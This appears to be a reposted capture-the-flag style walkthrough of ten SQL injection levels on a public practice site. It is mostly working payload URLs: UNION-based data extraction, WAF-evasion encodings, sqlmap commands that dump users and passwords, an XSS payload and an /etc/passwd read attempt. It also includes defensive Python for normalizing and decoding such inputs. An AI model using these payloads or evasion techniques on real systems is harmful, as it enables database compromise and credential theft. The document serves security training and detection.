SQL Challenges practice target
http://www.zixem.altervista.org/SQLi/
![](https://upload-images.jianshu.io/upload_images/4664072-f7cd648c44209108.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 1
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-9ce3848404c489dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-b8ee7806182170cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+
![](https://upload-images.jianshu.io/upload_images/4664072-8fec1913711543b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-7977a0c0083d2f93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+
![](https://upload-images.jianshu.io/upload_images/4664072-8e7a0b2f6fbd789c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sqlmap -u "injection point" --dbs
sqlmap -u "injection point" -D xx --tables
sqlmap -u "injection point" -D XX -T XX --columns
sqlmap -u "injection point" -D XX -T XX -C XX --dump
sqlmap -u "injection point" --users
sqlmap -u "injection point" --passwords
![](https://upload-images.jianshu.io/upload_images/4664072-93c4556e08c88297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
XSS
http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E
Level 2
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-695f2670873ff83b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-33e2c53b52a40a22.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-6092ac0e5445af51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-adcf1d12e4980533.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-6f292d75c71f6452.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-63c43fd72d4794a1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c1903f3a72e98784.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 3
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-a7982eda68e167f1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-9050a859130deb68.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-5fc80a7a97e99bb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-94bd1e53f949356d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-f000d1d4190e82ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-b00d8a6219ee9aed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-4e1400683df03086.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 4
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-357e609408a840ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-67e2152c4cc930e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-7e86099e1c6d3559.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+
![](https://upload-images.jianshu.io/upload_images/4664072-d8cfb7df0bc9723f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+
![](https://upload-images.jianshu.io/upload_images/4664072-bb1795c1406ba583.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+
![](https://upload-images.jianshu.io/upload_images/4664072-ebe7e9280e2aa5e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 5
http://www.zixem.altervista.org/SQLi/login_lvl5.php
![](https://upload-images.jianshu.io/upload_images/4664072-a935671a33abdd78.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c
![](https://upload-images.jianshu.io/upload_images/4664072-7f696a9018c235ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a738cea7f5b18a38.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 6
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-b817fa99e278f24b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-f1a84e373d6be250.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-b4f2d18c6a50bed3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-d5251ef5706d37be.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Run the blind injection with sqlmap
Level 7
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-287bb2a0c3dd6dd8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-95675b5c678807e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-e106de5ef0b1251b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+
![](https://upload-images.jianshu.io/upload_images/4664072-6a0e5adb81d8f6ed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+
![](https://upload-images.jianshu.io/upload_images/4664072-74c0dbb3653f5bc8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a8e8085a7721b8e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+
![](https://upload-images.jianshu.io/upload_images/4664072-7dc8dfd677487206.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6e52d48be72f03e2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 8
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\
![](https://upload-images.jianshu.io/upload_images/4664072-0dec185804185cbe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27
![](https://upload-images.jianshu.io/upload_images/4664072-253f965d41c8932d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-c64a3f42b1c7a8d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-4ba8f23178d95e07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
![](https://upload-images.jianshu.io/upload_images/4664072-5446705883e288f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+
![](https://upload-images.jianshu.io/upload_images/4664072-f3bcc94c671d5203.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-12d01e2b7b094e3c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Special-character bypass
A plus sign (+)
A simple URL encoded space (%20)
A null byte (%00)
A newline (%0a)
A tab (%09)
A carriage return (%0d)
Constructing the PoC
Space %20
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
![](https://upload-images.jianshu.io/upload_images/4664072-df9966c421551cb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Null byte %00
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-f518058cd08fce9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Newline \n %0a
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-271e6900e460a9e4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Carriage return %0d
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-277f9136dfb1baa9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-928981113782b882.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-6fb474fcb0d293e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ed1578a02ad771f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--
![](https://upload-images.jianshu.io/upload_images/4664072-c24bb77c48a7f2de.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-11c252d6b4a7ea25.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Mixed case
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-48361609f020be7f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
URL encoding
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20
![](https://upload-images.jianshu.io/upload_images/4664072-50b40fb4b3f83440.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Using the special character *
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-00361208681e1097.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-08c0b88ac60f167f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Keyword replacement
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-5b1bca75120acd99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--
![](https://upload-images.jianshu.io/upload_images/4664072-cf8f2f3e3231aceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
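The Level 8 variants above differ only in percent-encoding depth, whitespace substitutes, letter case and comment markers, so a log or WAF rule has to canonicalize the value before matching. Added example (not part of the original post): a normalizer and a deliberately small signature, checked against `id` values copied from this page; the function names and the signature itself are assumptions.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */, so keep the body and drop the markers.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary /* ... */ comments act as a separator between tokens.
PLAIN = re.compile(r"/\*.*?\*/", re.S)
# NUL, tab, newline, carriage return and space all collapse to one space.
BLANKS = re.compile(r"[\x00\s]+")

# Small illustrative signature (assumption): the probes used in this write-up.
SIGNATURE = re.compile(
    r"\bunion (?:all )?select\b|\border by \d+|\band \d+=\d+"
)


def normalize(value: str, max_rounds: int = 3) -> str:
    """Canonicalize a raw query-string value before signature matching."""
    for _ in range(max_rounds):  # undoes %2509-style double encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN.sub(" ", value)
    value = BLANKS.sub(" ", value)
    return value.strip().lower()


def suspicious(value: str) -> bool:
    """True when the normalized value matches the signature."""
    return bool(SIGNATURE.search(normalize(value)))


# Raw `id` values as they would appear in an access log (copied from this page).
SAMPLES = [
    "1",
    "1%00and%001=1--+",
    "1%0aand%0a1=1--+",
    "1'/**/and/**/1=1--+",
    "1%09UNION%09/*!SeLECt*/%091,2,3--",
    "1%2509union%2509select%25091,2,3--%20",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(f"{suspicious(raw)!s:5}  {raw}  ->  {normalize(raw)}")
```

Matching the raw log value without normalization misses every one of these variants; the keyword-splitting payloads (`SEselectLECT`) are not covered here because they depend on the application's own filter.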
Level 9
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--
![](https://upload-images.jianshu.io/upload_images/4664072-ac31212a1a2bd844.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-2171a8df4579e26d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+
![](https://upload-images.jianshu.io/upload_images/4664072-0a008807a229f09e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-53dc071e31c0f4e7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+
![](https://upload-images.jianshu.io/upload_images/4664072-6561943fd071e8cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+
![](https://upload-images.jianshu.io/upload_images/4664072-3cc0a6ef6625128f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 10
http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-35f23e2bdfc105c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Constructing the encoded value
1 AND 1=2 UNION SELECT 1,2--
Encode it with the Uuencode decoder tool (uuencoded output):
<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```
![](https://upload-images.jianshu.io/upload_images/4664072-5207499f54d2bf14.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Base64 encoding
PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-b0a74b2812d4a6ed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-95440bf2d52091f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Constructing the injection statement
1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--
Result
M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```
![](https://upload-images.jianshu.io/upload_images/4664072-c0c652c6537dca73.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Base64 encoding
TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
![](https://upload-images.jianshu.io/upload_images/4664072-c3f9c7bca083260b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
![](https://upload-images.jianshu.io/upload_images/4664072-9cdbd29bd0ba1ca0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
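The Level 10 parameter is uuencoded text wrapped in base64, so any input check or log inspection has to run on the value after both layers are removed. Added example (not from the original post): it unwraps two `x` values copied from the URLs above with Python's standard library and applies an integer allow-list; the function names and the 9-digit bound are assumptions.

```python
import base64
import binascii


def unwrap_x(param: str) -> str:
    """Undo base64, then uuencode, and return the inner text."""
    raw = base64.b64decode(param, validate=True)
    out = bytearray()
    for line in raw.splitlines():
        if line:  # skip blank lines; a2b_uu() expects a length character
            out += binascii.a2b_uu(line)
    return out.decode("ascii", errors="replace")


def is_expected_id(param: str) -> bool:
    """Allow-list check applied to the fully decoded value."""
    try:
        inner = unwrap_x(param)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    # Hypothetical policy: the application only ever needs a short integer.
    return inner.isascii() and inner.isdigit() and len(inner) <= 9


# The challenge's original value and the first modified value from this page.
ORIGINAL = "ISwwYGAKYAo="
MODIFIED = "PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo="

if __name__ == "__main__":
    for p in (ORIGINAL, MODIFIED):
        print(f"{is_expected_id(p)!s:5}  {unwrap_x(p)!r}")
```

A filter that only inspects the base64 text sees nothing but letters and digits; the allow-list has to sit after the last decoding step, and the query itself should still be parameterized.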
Reference: https://www.cnblogs.com/hack404/p/10387894.html